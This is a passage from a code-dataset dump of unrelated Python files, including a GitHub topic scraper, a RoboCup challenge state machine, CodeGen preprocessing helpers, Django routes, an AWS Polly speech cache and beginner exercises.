1800,\r\n        # 'LOG_LEVEL': 'DEBUG',\r\n        # 'LOG_FILE': 'log_%s.txt' % time.time(), # log file settings\r\n    }\r\n\r\n\r\n    
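# Crawl flow, as wired below: topic listing -> repo page -> issues ->\r\n    # pulls -> dependency graph; the growing item dict travels through the\r\n    # callbacks via cb_kwargs and is yielded at the end of the chain.\r\n    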
def start_requests(self):\r\n        urls = [\"http://github.com/topics/python?page=1\"]\r\n        for url in urls:\r\n            yield scrapy.Request(url=url, callback=self.parse)\r\n\r\n\r\n    def parse(self, response):\r\n\r\n        article = response.css(\"article.color-bg-secondary\")\r\n        for i, repos in enumerate(article):\r\n            user, proj = repos.css(\"h3 a::text\").getall()[:2] # user and project name\r\n            star = repos.css(\"a.social-count::text\").get()\r\n            primary = repos.css(\"div.color-bg-primary.rounded-bottom-1\")\r\n            about = primary.css(\"div.px-3.pt-3 div::text\").get()\r\n\r\n            proj_page = repos.css(\"h3 a[data-ga-click='Explore, go to repository, location:explore feed']::attr(href)\").get()\r\n            proj_page_link = f\"http://github.com{proj_page}\"\r\n\r\n            item = dict({\r\n                \"user\": user and user.strip(), # uploader\r\n                \"proj\": proj and proj.strip(), # project name\r\n                \"star\": star and convert_str_to_number(star.strip()), # star count\r\n                \"proj_page_link\": f\"http://github.com{proj_page}\", # project URL\r\n                \"about\": about and about.strip(), # project description\r\n            })\r\n\r\n            yield scrapy.Request(url=proj_page_link, callback=self.parse_proj, cb_kwargs=dict(quote=item)) # go to the project detail page\r\n\r\n        time.sleep(1)\r\n        next_page = response.css(\"body main form.ajax-pagination-form.js-ajax-pagination input::attr(value)\").get()\r\n        if next_page: # pagination\r\n            next_url = f\"http://github.com/topics/python?page={next_page}\"\r\n            yield scrapy.Request(url=next_url, callback=self.parse)\r\n\r\n\r\n\r\n\r\n\r\n    def parse_proj(self, response, quote): # crawl details from the project page\r\n\r\n        def extract_with_css(query):\r\n            return response.css(query).get(default='').strip()\r\n\r\n        def extract_with_allcss(query): # get all matching elements\r\n            return list(map(str.strip, response.css(query).getall()))\r\n\r\n        def extract_with_allcss_zip(query): # zip key-value pairs (used for the language breakdown)\r\n            kv = response.css(query).getall()\r\n            if kv:\r\n                keys = []\r\n                values = []\r\n                for i in range(0, len(kv), 2):\r\n                    keys.append(kv[i])\r\n                    values.append(kv[i + 1])\r\n                return list(zip(map(str.strip, keys), map(str.strip, values)))\r\n            else:\r\n                return []\r\n\r\n        Readme_text = extract_with_css(\"article[class='markdown-body entry-content container-lg']::text\")\r\n        fork_num = extract_with_css(\"body main ul li a[href$='network/members']::text\")\r\n        Releases_num = extract_with_css(\"h2[data-pjax^='#repo'] a span[data-view-component='true']::text\")\r\n        branches_num = extract_with_css(\"a[href$='branches'] strong::text\")\r\n        Contributors_num = extract_with_css(\"div[class='BorderGrid-cell'] h2 a[href$='contributors'] span::text\")\r\n\r\n        quote.update(\r\n            {\r\n                \"Readme\": Readme_text,  # Readme\r\n                \"fork\": convert_str_to_number(fork_num), # fork count\r\n                \"Releases\": convert_str_to_number(Releases_num), # release count\r\n                \"branches\": branches_num, # branch count\r\n                \"Contributors\": Contributors_num, # contributor count\r\n                \"toptags\": extract_with_allcss(\"div[class='f6'] a[data-ga-click='Topic, repository page']::text\"), # topic tags\r\n                \"Languages\": extract_with_allcss_zip(\"ul[class='list-style-none'] a[class^='d-inline'] span::text\"), # language composition\r\n\r\n            }\r\n        )\r\n        time.sleep(1)\r\n        issues_page_link = f\"{quote['proj_page_link']}/issues\"\r\n        yield scrapy.Request(url=issues_page_link, callback=self.parse_proj_issues, cb_kwargs=dict(quote=quote))\r\n\r\n\r\n    def parse_proj_issues(self, response, quote):\r\n        def extract_with_css(query):\r\n            res = response.css(query).getall()\r\n            if res:\r\n                return res[-1].split()[0].strip() # strip the extra text, keep only the number\r\n            else:\r\n                return 0\r\n\r\n        quote.update(\r\n            {\r\n                \"issues_open_num\": extract_with_css(\"div[class$='no-wrap'] div[class^='table-list-header'] 
a[data-ga-click$='Open']::text\"), # open issue count\r\n                \"issues_closed_num\": extract_with_css(\"div[class$='no-wrap'] div[class^='table-list-header'] a[data-ga-click$='Closed']::text\") # closed issue count\r\n            }\r\n        )\r\n        time.sleep(1)\r\n        pulls_page_link = f\"{quote['proj_page_link']}/pulls\"\r\n        yield scrapy.Request(url=pulls_page_link, callback=self.parse_proj_pulls, cb_kwargs=dict(quote=quote))\r\n\r\n\r\n    def parse_proj_pulls(self, response, quote):\r\n        def extract_with_css(query):\r\n            res = response.css(query).getall()\r\n            if res:\r\n                return res[-1].split()[0].strip() # strip the extra text, keep only the number\r\n            else:\r\n                return 0\r\n\r\n        quote.update(\r\n            {\r\n                \"pulls_open_num\": extract_with_css(\"div[class^='d-block'] a[href$='pr']::text\"), # open pull request count\r\n                \"pulls_closed_num\": extract_with_css(\"div[class^='d-block'] a[href$='closed']::text\") # closed pull request count\r\n            }\r\n        )\r\n        time.sleep(1)\r\n        dependency_page_link = f\"{quote['proj_page_link']}/network/dependencies\"\r\n        yield scrapy.Request(url=dependency_page_link, callback=self.parse_proj_dependency, cb_kwargs=dict(quote=quote))\r\n\r\n\r\n    def parse_proj_dependency(self, response, quote):\r\n        def extract_with_allcss(query): # get all matching elements\r\n            return list(map(str.strip, response.css(query).getall()))\r\n\r\n        quote.update(\r\n            {\r\n                \"dependency\": extract_with_allcss(\"div[class^='Box-row'] span a span::text\") # dependencies\r\n            }\r\n        )\r\n        print(f\"***************************************** Project '{quote['proj']}' has been crawled *****************************************\")\r\n        yield quote\r\n\r\n\r\n\r\n\r\n\r\nfrom scrapy.crawler import CrawlerProcess\r\n\r\nprocess = CrawlerProcess()\r\nprocess.crawl(GitpySpider)\r\nprocess.start()\r\n\r\n","repo_name":"AkiiLucky/Python_notes","sub_path":"爬虫/Scrapy框架/Gitpy_Spider.py","file_name":"Gitpy_Spider.py","file_ext":"py","file_size_in_byte":7721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28520390746","text":"import time\nfrom enum import Enum\nfrom aux.utils import red_print, blue_print, green_print, purple_print\nfrom aux.GCSocket import GCCommands\n\nfrom aux.hw_challenge_1 import Challenge_1\nfrom aux.hw_challenge_2 import Challenge_2\nfrom aux.hw_challenge_3 import Challenge_3\nfrom aux.hw_challenge_4 import Challenge_4\nfrom aux.tc_ball_placement import BallPlacement\n\nfrom aux.challenge_aux import ChallengeSteps, ChallengeEvents, Action\n\nROBOT_STOP_TRESHOLD = 5 # in seconds\nMAX_CHALLENGES = 5\n\n\nclass ChallengeFSM(object):\n    def __init__(self):\n        self.current_step = ChallengeSteps.STEP_0\n        self.current_challenge = None\n        self.challenge_end_callback = None\n        self.current_action = Action()\n\n        # Used when time needs to be counted\n        self.dt_cmd = [0, 0]\n        self.dt_chl = [0, 0]\n\n    def challenge_external_event(self, event: ChallengeEvents):\n        if event == ChallengeEvents.GOAL and self.current_challenge.id in [1, 2]:\n            dt = self.dt_cmd[1] - self.dt_cmd[0]\n            if dt > 1:\n                self.finish_challenge()\n\n        elif event == ChallengeEvents.ROBOT_STOPPED and self.current_challenge.id == 3:\n            self.finish_challenge()\n\n        elif event == ChallengeEvents.STOP and self.current_challenge.id == 5:\n            dt = self.dt_cmd[1] - self.dt_cmd[0]\n            if dt > 1 and self.current_step == ChallengeSteps.STEP_4:\n                purple_print('\\nStop!')\n                self.finish_challenge()\n\n    def finish_challenge(self):\n        self.proceed_step()\n        blue_print('\\nFinish Challenge!')\n\n        if self.current_step == ChallengeSteps.STEP_0 and \\\n                self.challenge_end_callback != None:\n            self.dt_chl[1] = time.time_ns() / 1e9\n\n            blue_print('Stop challenge timer!')\n\n            
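# let the observer registered via set_end_callback() know the run is over\n            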
self.challenge_end_callback()\n\n def set_challenge(self, challenge: int):\n self.current_step = ChallengeSteps.STEP_1\n self.dt_chl = [0, 0]\n\n if not isinstance(challenge, int) or \\\n (challenge < 1 or challenge > MAX_CHALLENGES):\n raise ValueError(\n f'Challenge ID must be between 1 and {MAX_CHALLENGES}!')\n\n if challenge == 1:\n self.current_challenge = Challenge_1\n elif challenge == 2:\n self.current_challenge = Challenge_2\n elif challenge == 3:\n self.current_challenge = Challenge_3\n elif challenge == 4:\n self.current_challenge = Challenge_4\n elif challenge == 5:\n self.current_challenge = BallPlacement\n\n green_print('[CHALLENGE FSM] Challenge {} set!'.format(challenge))\n\n def set_end_callback(self, callback_fn=None):\n if callback_fn != None:\n self.challenge_end_callback = callback_fn\n green_print('[CHALLENGE FSM] Callback set!')\n\n def proceed_step(self):\n next_step = ChallengeSteps.next_step(self.current_step)\n\n if next_step.value <= self.current_challenge.max_steps:\n self.current_step = next_step\n else:\n self.current_step = ChallengeSteps.STEP_0\n\n def get_challenge_time(self):\n ch_time = self.dt_chl[1] - self.dt_chl[0]\n if self.current_challenge.id == 3:\n ch_time = ch_time - ROBOT_STOP_TRESHOLD\n return ch_time\n\n def get_current_command(self) -> GCCommands:\n action = self.current_challenge.Step(self.current_step)\n timer_ended = False\n\n if action.timer != 0 and self.dt_cmd == [0, 0]:\n self.dt_cmd[0] = time.time_ns() / 1e9\n self.dt_cmd[1] = time.time_ns() / 1e9\n\n elif action.timer != 0 and self.dt_cmd[0] > 0:\n self.dt_cmd[1] = time.time_ns() / 1e9\n\n dt = self.dt_cmd[1] - self.dt_cmd[0]\n print('Challenge time = {:.2f}/{} s'.format(dt, action.timer),\n end='\\r')\n\n if dt >= action.timer:\n timer_ended = True\n self.dt_cmd = [0, 0]\n\n if action.command != GCCommands.NONE or timer_ended:\n if action.start_timer and self.dt_chl[0] == 0:\n self.dt_chl[0] = time.time_ns() / 1e9\n blue_print('Starting challenge timer...')\n\n self.proceed_step()\n\n if self.current_step == ChallengeSteps.STEP_0 and \\\n self.challenge_end_callback != None:\n self.dt_chl[1] = time.time_ns() / 1e9\n\n if timer_ended:\n blue_print('\\nStop challenge timer - Timeout =(!')\n else:\n blue_print('\\nStop challenge timer - Completed =)!')\n\n self.challenge_end_callback()\n\n return action.command\n","repo_name":"RoboCup-SSL/ssl-hardware-challenge-tool","sub_path":"src/aux/hw_challenge_fsm.py","file_name":"hw_challenge_fsm.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"17815600221","text":"import argparse\nimport json\nimport random\nimport subprocess\nfrom pathlib import Path\nfrom logging import getLogger\n\nfrom codegen_sources.model.preprocess import XLM_preprocess\nimport typing as tp\n\n\nPathLike = tp.Union[str, Path]\n\nREPO_ROOT = str(Path(__file__).parents[2])\n\nFALSY_STRINGS = {\"off\", \"false\", \"0\"}\nTRUTHY_STRINGS = {\"on\", \"true\", \"1\"}\n\nlogger = getLogger()\n\n\ndef bool_flag(s):\n \"\"\"\n Parse boolean arguments from the command line.\n \"\"\"\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"Invalid value for a boolean flag!\")\n\n\ndef is_valid_file(filepath: tp.Optional[PathLike]) -> bool:\n if filepath is None:\n return False\n if isinstance(filepath, str):\n filepath = Path(filepath)\n else:\n assert isinstance(filepath, Path)\n return 
filepath.is_file() and filepath.stat().st_size > 0\n\n\ndef get_nlines(file_path):\n    assert file_path.is_file(), file_path\n    process = subprocess.run(\n        f\"wc -l {file_path}\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n    )\n    assert process.returncode == 0\n    out = process.stdout.decode()\n    return int(out.lstrip().split(\" \")[0])\n\n\ndef check_same_number_of_lines(file_path1, file_path2):\n    nlines1 = get_nlines(file_path1)\n    nlines2 = get_nlines(file_path2)\n    assert (\n        nlines1 == nlines2\n    ), f\"{file_path1} contains {nlines1} examples vs {file_path2}: {nlines2} examples\"\n\n\ndef head(file_path, n):\n    n = int(n)\n    with file_path.open(\"r\", encoding=\"utf-8\") as f:\n        h = [next(f) for i in range(n)]\n    return h\n\n\ndef get_subset_file(file_paths: tp.List[Path], subset_size_gb: int, output_path: Path):\n    \"\"\"\n    Return one file containing a subset of the files in file_paths.\n    The subset is of size subset_size_gb.\n    The subset contains an equal portion of all files.\n    \"\"\"\n    if output_path.is_file():\n        return f\"{output_path}\"\n    for file_path in file_paths:\n        size_gb = file_path.stat().st_size / 1024 ** 3\n        n_lines = get_nlines(file_path)\n        subset_n_lines = int((subset_size_gb / len(file_paths)) * (n_lines / size_gb))\n        process = subprocess.run(\n            f\"head -q -n {subset_n_lines} {file_path} >> {output_path}\",\n            shell=True,\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE,\n            executable=\"/bin/bash\",\n        )\n        assert process.returncode == 0\n    logger.info(\n        f\"Subset of {[f.name for f in file_paths]} created at: {output_path.name}. Size=({output_path.stat().st_size / 1024 ** 3:.2f}GB).\"\n    )\n    shuf_file(output_path)\n    return f\"{output_path}.shuf\"\n\n\ndef truncate_files(file_paths):\n    all_lines = []\n    for f in file_paths:\n        with f.open(\"r\", encoding=\"utf-8\") as f:\n            lines = f.readlines()\n        all_lines.append(lines)\n    mini = min([len(lines) for lines in all_lines])\n    for i, f in enumerate(file_paths):\n        if len(all_lines[i]) > mini:\n            with f.open(\"w\", encoding=\"utf-8\") as f:\n                for j in range(mini):\n                    f.write(all_lines[i][j])\n\n\ndef write_head(file_path, n):\n    n = int(n)\n    with file_path.open(\"r\", encoding=\"utf-8\") as f:\n        h = [next(f) for i in range(n)]\n    with file_path.open(\"w\", encoding=\"utf-8\") as f:\n        f.write(\"\".join(h))\n    return h\n\n\ndef shuf_file(file_path):\n    process = subprocess.run(\n        f\"shuf {file_path} -o {file_path}.shuf\",\n        shell=True,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE,\n    )\n    assert (\n        process.returncode == 0\n    ), f\"failed to shuffle {file_path}\\n Error {process.stderr.decode()}\"\n\n\ndef get_all_pairs(items):\n    return [\n        (items[i], items[j])\n        for i in range(len(items))\n        for j in range(i + 1, len(items))\n    ]\n\n\ndef shuf_parallel_files(file_paths: tp.List[PathLike]) -> None:\n    lines_order: tp.List[int] = []\n    for input_path in file_paths:\n        input_path = Path(input_path)\n        with input_path.open(\"r\", encoding=\"utf8\") as f:\n            lines = f.readlines()\n        if not lines_order:\n            # draw one random order and reuse it for every file so they stay aligned\n            lines_order = list(range(len(lines)))\n            random.shuffle(lines_order)\n\n        if len(lines_order) != len(lines):\n            raise RuntimeError(\n                f\"files with different number of lines in {file_paths} \"\n                f\"({len(lines_order)} and {len(lines)})\"\n            )\n        reordered = [lines[i] for i in lines_order]\n        with open(f\"{input_path}.shuf\", \"w\", encoding=\"utf8\") as f:\n            f.writelines(reordered)\n\n\ndef get_repo_to_group_dict(repo_groups_path):\n    repo_groups = open(repo_groups_path, \"r\").read().strip()\n    repo_groups_dict = 
json.loads(repo_groups)\n repo_to_group = dict()\n for k, values in repo_groups_dict.items():\n for v in values:\n assert v not in repo_to_group\n repo_to_group[v] = k\n return repo_to_group\n\n\ndef binarize_for_XLM_file(file_path, vocab):\n assert get_nlines(file_path) > 0\n return XLM_preprocess(str(vocab), str(file_path), str(file_path) + \".pth\")\n\n\ndef create_symlink(file_path, symlink):\n if isinstance(file_path, str):\n file_path = Path(file_path)\n if isinstance(symlink, str):\n symlink = Path(symlink)\n assert (\n file_path.is_file() or symlink.parent.joinpath(file_path).resolve().is_file()\n ), f\"{file_path} is not a file: resolved into {symlink.parent.joinpath(file_path).resolve()}\"\n assert not symlink.is_file(), f\"{symlink} already exists\"\n process = subprocess.run(\n f\"ln -s {file_path} {symlink}\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n assert (\n symlink.is_file() and process.returncode == 0\n ), f\"failed to create symlink {symlink} for file {file_path} \"\n\n\ndef matched(str):\n count = 0\n is_in_string = False\n string_char = \"\"\n previous_char = \"\"\n for i, c in enumerate(str):\n if is_in_string:\n if c == string_char and (\n previous_char != \"\\\\\" or (i >= 2 and str[i - 2] == \"\\\\\")\n ):\n is_in_string = False\n previous_char = c\n continue\n if c == \"(\":\n count += 1\n elif c == \")\":\n count -= 1\n if count < 0:\n return False\n if c == '\"' or c == \"'\":\n is_in_string = True\n string_char = c\n return count == 0\n\n\ndef split_arguments(s):\n open_parentheses = {\"[\", \"{\", \"(\"}\n close_parentheses = {\"]\", \"}\", \")\"}\n s = s.strip()\n while s.startswith(\"(\") and s.endswith(\")\") and matched(s[1:-1]):\n s = s[1:-1]\n parenth_count = 0\n arguments = [[]]\n is_in_string = False\n string_char = \"\"\n previous_char = \"\"\n for i, c in enumerate(s):\n if is_in_string:\n arguments[-1].append(c)\n if c == string_char and (\n previous_char != \"\\\\\" or (i >= 2 and s[i - 2] == \"\\\\\")\n ):\n is_in_string = False\n previous_char = c\n continue\n if c in open_parentheses:\n parenth_count += 1\n if c in close_parentheses:\n parenth_count -= 1\n if c == \",\" and parenth_count == 0:\n arguments.append([])\n else:\n arguments[-1].append(c)\n previous_char = c\n if c == '\"' or c == \"'\":\n is_in_string = True\n string_char = c\n\n assert parenth_count == 0, (parenth_count, s)\n return [\"\".join(chars) for chars in arguments]\n","repo_name":"facebookresearch/CodeGen","sub_path":"codegen_sources/preprocessing/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7659,"program_lang":"python","lang":"en","doc_type":"code","stars":617,"dataset":"github-code","pt":"72"} +{"seq_id":"30736148946","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.home, name='home'), \n    #finch\n    path('finches/', views.finches_index, name='finches_index'), \n    path('finches/create/', views.FinchCreate.as_view(), name='finches_create'),\n    path('finches/<int:pk>/', views.finches_detail, name='finches_detail'),\n    path('finches/<int:pk>/update/', views.FinchUpdate.as_view(), name='finches_update'), \n    path('finches/<int:pk>/delete/', views.FinchDelete.as_view(), name='finches_delete'),\n    #feeding\n    path('finches/<int:pk>/add_feeding', views.add_feeding, name='add_feeding'),\n    #toy\n    path('finches/<int:pk>/assoc_toy/<int:toy_id>/', views.assoc_toy, name='assoc_toy'),\n    path('finches/<int:pk>/unassoc_toy/<int:toy_id>/', views.unassoc_toy, name='unassoc_toy'),\n    path('toys/', views.ToyList.as_view(), name='toys_index'),\n    path('toys/<int:pk>/', views.ToyDetail.as_view(), name='toys_detail'),\n    path('toys/create/', views.ToyCreate.as_view(), name='toys_create'),\n    path('toys/<int:pk>/update/', views.ToyUpdate.as_view(), name='toys_update'),\n    path('toys/<int:pk>/delete/', views.ToyDelete.as_view(), name='toys_delete'),\n    #sign up\n    path('accounts/signup/', views.signup, name='signup'),\n]\n\n","repo_name":"mymy209/finch-collector","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26395804448","text":"#BABATUNDE IDAHOR\n#PROJECT_4\n#COURSE : CS133\n#TERM: FALL 2015\n\n\n## This program translates an English word or phrase into Pig Latin. \n\nprint('Welcome to the Pig Latin Converter')\n\n\nplayAgain = 'yes'\nwhile playAgain.lower() == 'yes':\n    try: # Exception handler\n        phrase = input(\"Enter an English word or phrase: \")\n        print('------------------ OUTPUT ----------------------------------'+ '\\n')\n        \n\n        wordList = list() # creates the 1st new list\n        wordList2 = list() # creates the 2nd new list\n        symbol = \"!@#$%^&*()?.\" # stores the special symbols\n        latin_suffix = 'AY' # Latin suffix to be added to the end of the word.\n        \n        wordList.append(phrase) # adds the phrase to the list\n        split_word = phrase.split(' ') # separates each word\n        \n        display = '' # accumulates the converted words into a single string\n        \n        \n        # Loop over the words, converting each one and appending the suffix AY.\n        for i in range(0, len(split_word)):\n            wordList2 = split_word[i]\n            oldWord = wordList2\n            new_word = oldWord\n            for s in symbol:\n                new_word = new_word.strip(s)\n\n            new_word = new_word[1:] + new_word[0] + latin_suffix # Word or phrase rearrangement\n            if not new_word.isalpha():\n                raise Exception(\"Not a valid input!! Only words or phrases are allowed\") # report invalid input to the user\n            \n            # append the stripped symbols back to the word.\n            for s in symbol:\n                if s in oldWord:\n                    new_word = new_word + s\n            \n            new_word = new_word + ' '\n            display += new_word\n        \n        # prints out the phrase or word in upper case\n        print('English Word: '+ phrase.upper()+'.')\n        print('Pig Latin Word: '+ display.upper()+'.' )\n    except Exception as e:\n        print(e)\n\n    playAgain = \"\"\n    while(playAgain != \"yes\" and playAgain != \"no\"):\n        playAgain = input(\"Play Again..? 
: \").lower()\n","repo_name":"bidahor13/Python_projects","sub_path":"P4/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35558339879","text":"import sys\nfrom collections import OrderedDict\nfrom options.train_options import TrainOptions\nimport data\nfrom util.iter_counter import IterationCounter\nfrom util.gm_visualizer import Visualizer\nfrom trainers.pix2pix_trainer import Pix2PixTrainer\nimport torch\nimport time\n\n###\n# 시간 체크\nstart_time=time.time()\n\n\n# parse options\nopt = TrainOptions().parse()\n\n# print options to help debugging\nprint(' '.join(sys.argv))\n\n# load the dataset\ndataloader = data.create_dataloader(opt)\n\n# create trainer for our model\ntrainer = Pix2PixTrainer(opt)\n\n# create tool for counting iterations\niter_counter = IterationCounter(opt, len(dataloader))\n\n# # create tool for visualization\nvisualizer = Visualizer(opt)\n\nbase_epoch=50\nfor epoch in iter_counter.training_epochs():\n iter_counter.record_epoch_start(epoch)\n for i, data_i in enumerate(dataloader, start=iter_counter.epoch_iter):\n iter_counter.record_one_iteration()\n \n # Training\n\n if i % opt.D_steps_per_G == 0:\n trainer.run_generator_one_step(data_i)\n trainer.run_discriminator_one_step(data_i)\n \n\n if not opt.skip_losses: # Loss 추이 출력 - 학습 20~25% 느려짐\n if epoch % opt.print_freq == 0:\n losses = trainer.get_latest_losses()\n visualizer.print_current_errors(epoch, losses) \n else: # loss 추이 출력 안 할때는 그냥 학습이 잘 되고있는지만 출력.\n if epoch % 10 ==0:\n mid_time=time.time()\n print('End of epoch %d / %d \\t Time Taken(Total): %d sec' %\n (epoch, opt.niter, mid_time-start_time))\n \n if iter_counter.needs_displaying():\n visuals = OrderedDict([('input_label', data_i['label']),\n ('synthesized_image', trainer.get_latest_generated()),\n ('real_image', data_i['image'])])\n visualizer.display_current_results(visuals, epoch, iter_counter.total_steps_so_far)\n\n# trainer.update_learning_rate(epoch)\n \n\n if epoch == opt.niter:\n print('Training was successfully finished.')\n print('saving the model at %d_net_G(D).pth' % (epoch))\n trainer.save(epoch)\n\nend_time=time.time()\n\nprint('Time for %d iterations : %d sec' %(opt.niter-50, end_time-start_time))","repo_name":"sjinu96/ITOMAI","sub_path":"SPADE/gm_train.py","file_name":"gm_train.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71863454632","text":"\"\"\"Speech synthesis with AWS Polly.\n\nText is chunked into sentences or even words which are cached individually.\nThis way, this script can be used offline once all sentences/words are cached.\n\nThis will happen faster when using words, since words can be recombined\nto support other sentences as well.\n\nOn the other hand, chunking into sentences will produce better results,\nas passing entire sentences to AWS enables it to produce results\nwith the correct sentence intonation and word spacing.\n\nPCM format is used so that content can be assembled from various (cached) files easily.\n\nThe PCM data returned from AWS is in a signed 16-bit, 1 channel, little-endian format.\n\nOn Linux, if ffmpeg is installed these pcm files can be played with:\n> ffplay -f s16le -ar 16000 -ac 1 file.pcm\n\nOn ubuntu, to use pyaudio you might have to install portaudio19-dev.\n\"\"\"\n\nimport os\nimport sys\nimport unicodedata\nimport uuid\nimport boto3\nimport time\nimport 
sqlite3\nimport appdirs\nimport logging\nimport datetime\nimport nltk\nimport pyaudio\n\n\nlogger = logging.getLogger(__name__)\n\ndata_dir = appdirs.user_data_dir('python-polly')\n\ndownload_dir = os.path.join(data_dir, 'download')\nos.makedirs(download_dir, exist_ok=True)\n\ndb_path = os.path.join(data_dir, 'polly.db')\nos.makedirs(os.path.dirname(db_path), exist_ok=True)\n\n\npolly_client = boto3.Session().client('polly')\n\npunctuation = ''.join(chr(i) for i in range(sys.maxunicode)\n if unicodedata.category(chr(i)).startswith('P'))\n\n\ndef get_db():\n db = sqlite3.connect(db_path)\n db.row_factory = sqlite3.Row\n return db\n\n\ndef ensure_requests_table():\n sql = \"\"\"create table if not exists polly_requests (\n id integer primary key,\n voice text,\n format text,\n text text,\n date text,\n path text\n )\n \"\"\"\n with get_db() as db:\n db.execute(sql)\n\n\ndef setup_db():\n ensure_requests_table()\n\n\ndef save_stream(s, filename):\n with open(filename, 'wb') as f:\n f.write(s.read())\n\n\ndef synthesize_with_aws(text, voice, format):\n response = polly_client.synthesize_speech(VoiceId=voice, OutputFormat=format,\n Text=text)\n return response['AudioStream']\n\n\ndef find_request(text, voice, format):\n db = get_db()\n return db.execute(\"\"\"select path from polly_requests\n where voice = ? and format = ? and text = ?\"\"\",\n (voice, format, text)).fetchone()\n\n\ndef save_request(text, voice, format, path):\n with get_db() as db:\n db.execute(\"\"\"insert into polly_requests (voice, format, text, path, date)\n values (?, ?, ?, ?, ?)\"\"\",\n (voice, format, text, path, datetime.datetime.utcnow().isoformat()))\n\n\ndef cache_stream(stream, text, voice, format):\n path = os.path.join(download_dir, str(uuid.uuid4()))\n save_stream(stream, path)\n save_request(text, voice, format, path)\n return path\n\n\ndef remove_double_quotation_marks(s):\n return s.translate(str.maketrans(dict.fromkeys(['\\u201C', '\\u201D', '\\u0022'])))\n\n\ndef synthesize_cached(text, voice, format):\n data = find_request(text, voice, format)\n if data is None:\n stream = synthesize_with_aws(text, voice, format)\n return cache_stream(stream, text, voice, format)\n else:\n return data['path']\n\n\ndef preprocess(text):\n return ' '.join(x.strip(punctuation).lower() for x in text.split())\n\n\ndef synthesize_by_words(stream, text, voice):\n for sent in nltk.tokenize.sent_tokenize(remove_double_quotation_marks(text)):\n for token in nltk.tokenize.word_tokenize(preprocess(sent)):\n src_path = synthesize_cached(token, voice, 'pcm')\n with open(src_path, 'rb') as ff:\n stream.write(ff.read())\n\n\ndef synthesize_by_sentences(stream, text, voice):\n sents = nltk.tokenize.sent_tokenize(remove_double_quotation_marks(text))\n for sent in sents:\n src_path = synthesize_cached(sent, voice, 'pcm')\n with open(src_path, 'rb') as ff:\n stream.write(ff.read())\n\n\nclass UnrecognizedUnit(Exception):\n pass\n\n\ndef synthesize_to_stream(stream, text, voice, unit):\n if unit == 'word':\n synthesize_by_words(stream, text, voice)\n elif unit == 'sentence':\n synthesize_by_sentences(stream, text, voice)\n else:\n raise UnrecognizedUnit(unit)\n\n\ndef synthesize(text, path, voice='Joanna', unit='word'):\n with open(path, 'wb') as f:\n synthesize_to_stream(f, text, voice, unit)\n\n\ndef say(text, voice='Joanna', unit='word'):\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paInt16, channels=1, rate=16000, output=True)\n synthesize_to_stream(stream, text, voice, unit)\n time.sleep(1)\n stream.stop_stream()\n 
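# close the stream before releasing the PyAudio instance\n    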
stream.close()\n    p.terminate()\n","repo_name":"krisfris/python-polly","sub_path":"polly/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9660321751","text":"import pymongo\nimport tkinter as tk\nimport tkinter.font as tkFont\nfrom tkinter import *\nfrom tkinter import ttk\n\n\n\nclient = pymongo.MongoClient('mongodb://localhost:27017')\n\nmydb = client['Employee']\n\ncol = mydb[\"employeeinformation\"]\n\nx = list(col.find())\n\nlist2 = []\n\n# read the fields straight off each document instead of slicing str(x[i])\n# at hard-coded offsets, which breaks as soon as the repr changes\nfor doc in x:\n    list1 = [doc.get(\"firstname\", \"\"), doc.get(\"lastname\", \"\"), doc.get(\"dep\", \"\")]\n    list2.append(list1)\n\n#list2 = [['abhi','patil','co'],['roman','reigns','co'],['seth','rollins','lkj']]\n\nwin = Tk()\n\nfrn = Frame(win)\nfrn.pack(side=tk.LEFT,padx=20)\n\ntv = ttk.Treeview(frn,columns=(1,2,3,4),show=\"headings\",height=\"5\")\n\ntv.pack()\n\ntv.heading(1,text=\"ID\")\ntv.heading(2,text=\"Name\")\ntv.heading(3,text=\"Lastname\")\ntv.heading(4,text=\"department\")\n\nfor i in range(len(x)):\n\n    tv.insert('', 'end', values=(i + 1, *list2[i]))  # row number fills the ID column\n\nwin.title(\"Customer Data\")\n#win.geometry(\"650x500\")\n#win.resizable(False,False)\nwin.mainloop()\n","repo_name":"Abhishekpatil12/Healthcaresystem","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42787160733","text":"def SquaringNumbers():\n    numbers = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n    # 🚨 Do Not Change the code above 👆\n\n    #Write your 1 line code 👇 below:\n\n    squared_numbers = [n*n for n in numbers]\n\n    #Write your code 👆 above:\n\n    print(squared_numbers)\n\n\ndef filterEvenNumbers():\n    numbers = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n    # 🚨 Do Not Change the code above\n\n    #Write your 1 line code 👇 below:\n\n    result = [n for n in numbers if n%2==0]\n\n    #Write your code 👆 above:\n\n    print(result)\n\n\ndef dicComprehension():\n    with open(\"file1.txt\") as file1:\n        data1 = file1.readlines()\n\n    with open(\"file2.txt\") as file2:\n        data2 = file2.readlines()\n    \n    result = [int(number) for number in data1 if number in data2]\n\n\n    # Write your code above 👆\n\n    print(result)\n\n\ndef dicNumberOfLetters():\n    